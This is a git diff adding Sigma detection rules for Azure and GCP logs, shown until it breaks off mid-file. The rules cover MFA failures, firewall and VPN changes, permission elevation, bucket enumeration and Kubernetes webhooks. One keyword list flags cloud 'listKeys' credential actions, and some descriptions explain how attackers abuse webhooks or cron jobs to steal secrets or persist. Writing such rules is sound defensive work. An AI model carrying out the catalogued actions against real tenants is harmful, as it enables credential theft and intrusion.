-0,0 +1,25 @@ +title: Multifactor Authentication Interupted +id: 5496ff55-42ec-4369-81cb-00f417029e25 +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 50074 + ResultDescription|contains: 'Strong Auth required' + selection1: + ResultType: 500121 + ResultDescription|contains: 'Authentication failed during strong authentication request' + condition: selection or selection1 +level: medium +falsepositives: + - Unknown +tags: + - attack.initial_access + - attack.t1078.004 diff --git a/bin/main/rules/others_cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml new file mode 100644 index 000000000..a679d1892 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Azure Network Firewall Policy Modified or Deleted +id: 83c17918-746e-4bd9-920b-8e098bf88c23 +description: Identifies when a Firewall Policy is Modified or Deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/02 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/FIREWALLPOLICIES/WRITE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/JOIN/ACTION + - MICROSOFT.NETWORK/FIREWALLPOLICIES/CERTIFICATES/ACTION + - MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml new file mode 100644 index 000000000..42ef6878a --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Azure Firewall Rule Configuration Modified or Deleted +id: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067 +description: Identifies when a Firewall Rule Configuration is Modified or Deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml new file mode 100644 index 000000000..16373fbd0 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml @@ -0,0 +1,27 @@ +title: Azure Point-to-site VPN Modified or Deleted +id: d9557b75-267b-4b43-922f-a775e2d1f792 +description: Identifies when a Point-to-site VPN is Modified or Deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/RESET/ACTION + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/GENERATEVPNPROFILE/ACTION + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DISCONNECTP2SVPNCONNECTIONS/ACTION + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_network_security_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_network_security_modified_or_deleted.yml new file mode 100644 index 000000000..395880e92 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_network_security_modified_or_deleted.yml @@ -0,0 +1,27 @@ +title: Azure Network Security Configuration Modified or Deleted +id: d22b4df4-5a67-4859-a578-8c9a0b5af9df +description: Identifies when a network security configuration is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/DELETE + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/JOIN/ACTION + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_network_virtual_device_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_network_virtual_device_modified_or_deleted.yml new file mode 100644 index 000000000..7e8ed5b4a --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_network_virtual_device_modified_or_deleted.yml @@ -0,0 +1,32 @@ +title: Azure Virtual Network Device Modified or Deleted +id: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3 +description: Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE + - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE + - MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE + - MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION + - MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE + - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/DELETE + - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/WRITE + - MICROSOFT.NETWORK/VIRTUALHUBS/DELETE + - MICROSOFT.NETWORK/VIRTUALHUBS/WRITE + - MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE + - MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_new_cloudshell_created.yml b/bin/main/rules/others_cloud/azure/azure_new_cloudshell_created.yml new file mode 100644 index 000000000..e06b47f2f --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_new_cloudshell_created.yml @@ -0,0 +1,21 @@ +title: Azure New CloudShell Created +id: 72af37e2-ec32-47dc-992b-bc288a2708cb +description: Identifies when a new cloudshell is created inside of Azure portal. +author: Austin Songer +status: experimental +date: 2021/09/21 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: MICROSOFT.PORTAL/CONSOLES/WRITE + condition: selection +level: medium +tags: + - attack.execution + - attack.t1059 +falsepositives: + - A new cloudshell may be created by a system administrator. diff --git a/bin/main/rules/others_cloud/azure/azure_owner_removed_from_application_or_service_principal.yml b/bin/main/rules/others_cloud/azure/azure_owner_removed_from_application_or_service_principal.yml new file mode 100644 index 000000000..d32b447cf --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_owner_removed_from_application_or_service_principal.yml @@ -0,0 +1,24 @@ +title: Azure Owner Removed From Application or Service Principal +id: 636e30d5-3736-42ea-96b1-e6e2f8429fd6 +description: Identifies when a owner is was removed from a application or service principal in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - Remove owner from service principal + - Remove owner from application + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Owner being removed may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_rare_operations.yml b/bin/main/rules/others_cloud/azure/azure_rare_operations.yml new file mode 100644 index 000000000..169ae1b53 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_rare_operations.yml @@ -0,0 +1,27 @@ +title: Rare Subscription-level Operations In Azure +id: c1182e02-49a3-481c-b3de-0fadc4091488 +status: test +description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. +author: sawwinnnaung +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/azureactivity/RareOperations.yaml +date: 2020/05/07 +modified: 2021/11/27 +logsource: + product: azure + service: azureactivity +detection: + keywords: + - Microsoft.DocumentDB/databaseAccounts/listKeys/action + - Microsoft.Maps/accounts/listKeys/action + - Microsoft.Media/mediaservices/listKeys/action + - Microsoft.CognitiveServices/accounts/listKeys/action + - Microsoft.Storage/storageAccounts/listKeys/action + - Microsoft.Compute/snapshots/write + - Microsoft.Network/networkSecurityGroups/write + condition: keywords +falsepositives: + - Valid change +level: medium +tags: + - attack.t1003 diff --git a/bin/main/rules/others_cloud/azure/azure_service_principal_created.yml b/bin/main/rules/others_cloud/azure/azure_service_principal_created.yml new file mode 100644 index 000000000..46a14b711 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_service_principal_created.yml @@ -0,0 +1,22 @@ +title: Azure Service Principal Created +id: 0ddcff6d-d262-40b0-804b-80eb592de8e3 +description: Identifies when a service principal is created in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/02 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: 'Add service principal' + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Service principal being created may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_service_principal_removed.yml b/bin/main/rules/others_cloud/azure/azure_service_principal_removed.yml new file mode 100644 index 000000000..43328012b --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_service_principal_removed.yml @@ -0,0 +1,22 @@ +title: Azure Service Principal Removed +id: 448fd1ea-2116-4c62-9cde-a92d120e0f08 +description: Identifies when a service principal was removed in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: Remove service principal + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Service principal being removed may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml b/bin/main/rules/others_cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml new file mode 100644 index 000000000..37c184fd9 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml @@ -0,0 +1,21 @@ +title: Azure Subscription Permission Elevation Via ActivityLogs +id: 09438caa-07b1-4870-8405-1dbafe3dad95 +status: experimental +author: Austin Songer @austinsonger +date: 2021/11/26 +description: Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization +logsource: + product: azure + service: activitylogs +detection: + selection1: + properties.message: MICROSOFT.AUTHORIZATION/ELEVATEACCESS/ACTION + condition: selection1 +level: high +falsepositives: + - If this was approved by System Administrator. +tags: + - attack.initial_access + - attack.t1078 diff --git a/bin/main/rules/others_cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml b/bin/main/rules/others_cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml new file mode 100644 index 000000000..a566a107b --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml @@ -0,0 +1,22 @@ +title: Azure Subscription Permission Elevation Via AuditLogs +id: ca9bf243-465e-494a-9e54-bf9fc239057d +status: experimental +author: Austin Songer @austinsonger +date: 2021/11/26 +description: Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: 'Administrative' + OperationName: 'Assigns the caller to user access admin' + condition: selection +level: high +falsepositives: + - If this was approved by System Administrator. +tags: + - attack.initial_access + - attack.t1078 diff --git a/bin/main/rules/others_cloud/azure/azure_suppression_rule_created.yml b/bin/main/rules/others_cloud/azure/azure_suppression_rule_created.yml new file mode 100644 index 000000000..7c079c960 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_suppression_rule_created.yml @@ -0,0 +1,22 @@ +title: Azure Suppression Rule Created +id: 92cc3e5d-eb57-419d-8c16-5c63f325a401 +description: Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Suppression Rule being created may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_unusual_authentication_interruption.yml b/bin/main/rules/others_cloud/azure/azure_unusual_authentication_interruption.yml new file mode 100644 index 000000000..18691dfd3 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_unusual_authentication_interruption.yml @@ -0,0 +1,28 @@ +title: Azure Unusual Authentication Interruption +id: 8366030e-7216-476b-9927-271d79f13cf3 +status: experimental +author: Austin Songer @austinsonger +date: 2021/11/26 +description: Detects when there is a interruption in the authentication process. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection1: + ResultType: 50097 + ResultDescription: 'Device authentication is required' + selection2: + ResultType: 50155 + ResultDescription: 'DeviceAuthenticationFailed' + selection3: + ResultType: 50158 + ResultDescription: 'ExternalSecurityChallenge - External security challenge was not satisfied' + condition: selection1 or selection2 or selection3 +level: medium +falsepositives: + - Unknown +tags: + - attack.initial_access + - attack.t1078 diff --git a/bin/main/rules/others_cloud/azure/azure_user_login_blocked_by_conditional_access.yml b/bin/main/rules/others_cloud/azure/azure_user_login_blocked_by_conditional_access.yml new file mode 100644 index 000000000..5c087a6ee --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_user_login_blocked_by_conditional_access.yml @@ -0,0 +1,21 @@ +title: User Access Blocked by Azure Conditional Access +id: 9a60e676-26ac-44c3-814b-0c2a8b977adf +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Detect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 53003 + condition: selection +level: medium +falsepositives: + - Unknown +tags: + - attack.credential_access + - attack.t1110 diff --git a/bin/main/rules/others_cloud/azure/azure_virtual_network_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_virtual_network_modified_or_deleted.yml new file mode 100644 index 000000000..6b25808c8 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_virtual_network_modified_or_deleted.yml @@ -0,0 +1,26 @@ +title: Azure Virtual Network Modified or Deleted +id: bcfcc962-0e4a-4fd9-84bb-a833e672df3f +description: Identifies when a Virtual Network is modified or deleted in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message|startswith: + - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/ + - MICROSOFT.NETWORK/VIRTUALNETWORKS/ + properties.message|endswith: + - /WRITE + - /DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_vpn_connection_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_vpn_connection_modified_or_deleted.yml new file mode 100644 index 000000000..58d96b14e --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_vpn_connection_modified_or_deleted.yml @@ -0,0 +1,23 @@ +title: Azure VPN Connection Modified or Deleted +id: 61171ffc-d79c-4ae5-8e10-9323dba19cd3 +description: Identifies when a VPN connection is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/08 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/WRITE + - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/gcp/gcp_bucket_enumeration.yml b/bin/main/rules/others_cloud/gcp/gcp_bucket_enumeration.yml new file mode 100644 index 000000000..a94ef6b8a --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_bucket_enumeration.yml @@ -0,0 +1,23 @@ +title: Google Cloud Storage Buckets Enumeration +id: e2feb918-4e77-4608-9697-990a1aaf74c3 +description: Detects when storage bucket is enumerated in Google Cloud. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/14 +references: + - https://cloud.google.com/storage/docs/json_api/v1/buckets +logsource: + product: gcp + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - storage.buckets.list + - storage.buckets.listChannels + condition: selection +level: low +tags: + - attack.discovery +falsepositives: + - Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/gcp/gcp_bucket_modified_or_deleted.yml b/bin/main/rules/others_cloud/gcp/gcp_bucket_modified_or_deleted.yml new file mode 100644 index 000000000..514277727 --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_bucket_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Google Cloud Storage Buckets Modified or Deleted +id: 4d9f2ee2-c903-48ab-b9c1-8c0f474913d0 +description: Detects when storage bucket is modified or deleted in Google Cloud. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/14 +references: + - https://cloud.google.com/storage/docs/json_api/v1/buckets +logsource: + product: gcp + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - storage.buckets.delete + - storage.buckets.insert + - storage.buckets.update + - storage.buckets.patch + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml b/bin/main/rules/others_cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml new file mode 100644 index 000000000..7457bc91f --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml @@ -0,0 +1,21 @@ +title: Google Cloud Re-identifies Sensitive Information +id: 234f9f48-904b-4736-a34c-55d23919e4b7 +description: Identifies when sensitive information is re-identified in google Cloud. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/15 +references: + - https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify +logsource: + product: gcp + service: gcp.audit +detection: + selection: + gcp.audit.method_name: projects.content.reidentify + condition: selection +level: medium +tags: + - attack.impact + - attack.t1565 +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/gcp/gcp_dns_zone_modified_or_deleted.yml b/bin/main/rules/others_cloud/gcp/gcp_dns_zone_modified_or_deleted.yml new file mode 100644 index 000000000..4dfeac4be --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_dns_zone_modified_or_deleted.yml @@ -0,0 +1,23 @@ +title: Google Cloud DNS Zone Modified or Deleted +id: 28268a8f-191f-4c17-85b2-f5aa4fa829c3 +description: Identifies when a DNS Zone is modified or deleted in Google Cloud. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/15 +references: + - https://cloud.google.com/dns/docs/reference/v1/managedZones +logsource: + product: gcp + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - Dns.ManagedZones.Delete + - Dns.ManagedZones.Update + - Dns.ManagedZones.Patch + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml b/bin/main/rules/others_cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml new file mode 100644 index 000000000..73ed0ef20 --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml @@ -0,0 +1,27 @@ +title: Google Cloud Firewall Modified or Deleted +id: fe513c69-734c-4d4a-8548-ac5f609be82b +description: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/13 +references: + - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging + - https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html +logsource: + product: gcp + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - v*.Compute.Firewalls.Delete + - v*.Compute.Firewalls.Patch + - v*.Compute.Firewalls.Update + - v*.Compute.Firewalls.Insert + condition: selection +level: medium +tags: + - attack.defense_evasion + - attack.t1562 +falsepositives: + - Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected. + - Exceptions can be added to this rule to filter expected behavior. diff --git a/bin/main/rules/others_cloud/gcp/gcp_full_network_traffic_packet_capture.yml b/bin/main/rules/others_cloud/gcp/gcp_full_network_traffic_packet_capture.yml new file mode 100644 index 000000000..4cd3bf090 --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_full_network_traffic_packet_capture.yml @@ -0,0 +1,29 @@ +title: Google Full Network Traffic Packet Capture +id: 980a7598-1e7f-4962-9372-2d754c930d0e +description: Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/13 +references: + - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging + - https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html +logsource: + product: gcp + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - v*.Compute.PacketMirrorings.Get + - v*.Compute.PacketMirrorings.Delete + - v*.Compute.PacketMirrorings.Insert + - v*.Compute.PacketMirrorings.Patch + - v*.Compute.PacketMirrorings.List + - v*.Compute.PacketMirrorings.aggregatedList + condition: selection +level: medium +tags: + - attack.collection + - attack.t1074 +falsepositives: + - Full Network Packet Capture may be done by a system or network administrator. + - If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/gcp/gcp_kubernetes_admission_controller.yml b/bin/main/rules/others_cloud/gcp/gcp_kubernetes_admission_controller.yml new file mode 100644 index 000000000..f152d8fa0 --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_kubernetes_admission_controller.yml @@ -0,0 +1,36 @@ +title: Google Cloud Kubernetes Admission Controller +id: 6ad91e31-53df-4826-bd27-0166171c8040 +description: Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information. +author: Austin Songer @austinsonger +status: experimental +date: 2021/11/25 +modified: 2021/11/26 +references: + - https://cloud.google.com/kubernetes-engine/docs +logsource: + product: gcp + service: gcp.audit +detection: + selection1: + gcp.audit.method_name|startswith: admissionregistration.k8s.io.v*.mutatingwebhookconfigurations. + gcp.audit.method_name|endswith: + - create + - patch + - replace + selection2: + gcp.audit.method_name|startswith: admissionregistration.k8s.io.v*.validatingwebhookconfigurations. + gcp.audit.method_name|endswith: + - create + - patch + - replace + condition: selection1 or selection2 +level: medium +tags: + - attack.persistence + - attack.t1078 + - attack.credential_access + - attack.t1552 + - attack.t1552.007 +falsepositives: +- Google Cloud Kubernetes Admission Controller may be done by a system administrator. +- If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/gcp/gcp_kubernetes_cronjob.yml b/bin/main/rules/others_cloud/gcp/gcp_kubernetes_cronjob.yml new file mode 100644 index 000000000..bb3852358 --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_kubernetes_cronjob.yml @@ -0,0 +1,27 @@ +title: Google Cloud Kubernetes CronJob +id: cd3a808c-c7b7-4c50-a2f3-f4cfcd436435 +description: Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. +author: Austin Songer @austinsonger +status: experimental +date: 2021/11/22 +references: + - https://cloud.google.com/kubernetes-engine/docs + - https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ + - https://kubernetes.io/docs/concepts/workloads/controllers/job/ +logsource: + product: gcp + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - io.k8s.api.batch.v*.Job + - io.k8s.api.batch.v*.CronJob + condition: selection +level: medium +tags: + - attack.persistence + - attack.privilege_escalation + - attack.execution +falsepositives: +- Google Cloud Kubernetes CronJob/Job may be done by a system administrator. +- If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/gcp/gcp_kubernetes_rolebinding.yml b/bin/main/rules/others_cloud/gcp/gcp_kubernetes_rolebinding.yml new file mode 100644 index 000000000..008193831 --- /dev/null +++ b/bin/main/rules/others_cloud/gcp/gcp_kubernetes_rolebinding.yml @@ -0,0 +1,33 @@ +title: Google Cloud 